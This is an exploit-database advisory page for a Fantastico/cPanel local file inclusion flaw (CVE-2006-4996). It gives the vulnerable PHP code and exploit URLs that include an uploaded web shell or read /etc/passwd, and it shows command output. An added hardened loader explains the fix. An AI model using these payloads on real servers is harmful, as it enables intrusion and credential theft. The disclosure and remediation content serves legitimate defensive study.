Fantastico In all Version Cpanel 10.x <= local File Include

CVE: CVE-2006-4996
Category: CWE-98
Price: $500
Severity: High
Author: Unknown
Risk: High
Exploitation Type: Local
Date: 2007-03-21
CPE: cpe:cpe:/a:cpanel:all_versions
CVSS: CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
EPSS: 0.02192
EPSSP: 0.50148

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2007030118

Below is a copy:

##############################################################
Fantastico In all Version Cpanel 10.x <= local File Include

##############################################################
Note : the php.ini preparations assumed here are those of cPanel (hypothetical),
and they apply to any web server as well.

A valid username and password are required to log in on port 2082.
Works against the strongest protections: mod_security, safe_mode:On and
Disable functions (all / none).

Vulnerable Code ( 1  ) :
  // $userlanguage is taken straight from the request and never validated;
  // is_file() only confirms that some readable file exists at that path.
  if(is_file($userlanguage))
    {
        include ( $userlanguage );
    }

In

http://xx.com:2082/frontend/x/fantastico/includes/load_language.php

Exploit  1 :
http://xx.com:2082/frontend/x/fantastico/includes/load_language.php?userlanguage=/home/user/shell.php

id
uid=32170(user) gid=32170(user) groups=32170(user)

Exploit  2 :
http://xx.com:2082/frontend/x/fantastico/includes/load_language.php?userlanguage=/etc/passwd

###################################################
Vulnerable Code ( 2  ) :

// $fantasticopath can be supplied by the request, so the directory prefix
// of the included file is attacker-controlled; is_file() does not help.
$localmysqlconfig=$fantasticopath . "/includes/mysqlconfig.local.php";
if (is_file($localmysqlconfig))
{
include($localmysqlconfig);
}

in
http://xx.com:2082/frontend/x/fantastico/includes/mysqlconfig.php
And also many of the files of the program

Exploit :
First create a directory named (/includes/), upload Shell.php into
(/includes/), then rename it to mysqlconfig.local.php :D

:::xploit::::
http://xx.com:2082/frontend/x/fantastico/includes/mysqlconfig.php?fantasticopath=/home/user/

###################################################
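Both vulnerable snippets above share one defect: is_file() only confirms that a readable file exists, so a request-controlled path (the bare $userlanguage and $fantasticopath variables are populated from the query-string parameters shown in the exploit URLs) passes the check and reaches include(). The following hardened loader is an added example written for this page, not Fantastico or cPanel code; the languages directory, the allowlist and the language-file naming are assumptions.

```php
<?php
// Added example (not Fantastico/cPanel code): a language-file loader that never
// hands a request-controlled path to include().
declare(strict_types=1);

// Hypothetical base directory for shipped language files. The original derives
// its prefix from a request-controlled $fantasticopath; this version never does.
const LANG_DIR = __DIR__ . '/languages';

/**
 * Resolve a user-supplied language code to a file inside LANG_DIR, or null.
 *  - The input must be a short lowercase token (no slashes, dots or NUL bytes),
 *    which rejects "/home/user/shell.php", "/etc/passwd", "../" and "%00".
 *  - The token must be on an explicit allowlist of languages we ship.
 *  - The resolved path must still lie under LANG_DIR after realpath(), which
 *    also defends against a symlink dropped inside the directory.
 */
function resolveLanguageFile(string $requested, array $allowed = ['english', 'french', 'german']): ?string
{
    if (!preg_match('/\A[a-z]{2,16}\z/', $requested)) {
        return null;
    }
    if (!in_array($requested, $allowed, true)) {
        return null;                       // unknown language: never include it
    }
    $base = realpath(LANG_DIR);
    $candidate = realpath(LANG_DIR . '/' . $requested . '.php');
    if ($base === false || $candidate === false) {
        return null;                       // directory or file does not exist
    }
    // realpath() output is canonical, so a prefix test with the separator is enough.
    if (strncmp($candidate, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $candidate;
}

// Usage: the raw parameter is only ever an allowlist lookup key, and the
// include() target is whatever the resolver returned, with a fixed fallback.
$userlanguage = $_GET['userlanguage'] ?? 'english';
$file = resolveLanguageFile($userlanguage) ?? resolveLanguageFile('english');
if ($file !== null) {
    include $file;
}
```

The same pattern applies to the mysqlconfig.local.php case: the base directory is a constant decided by the application, never a variable a request can set.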

Discovered By : cyb3rt & 020
###################################################

Special Greetings :_ Tryag-Team  &  4lKaSrGoLd3n-Team
###################################################
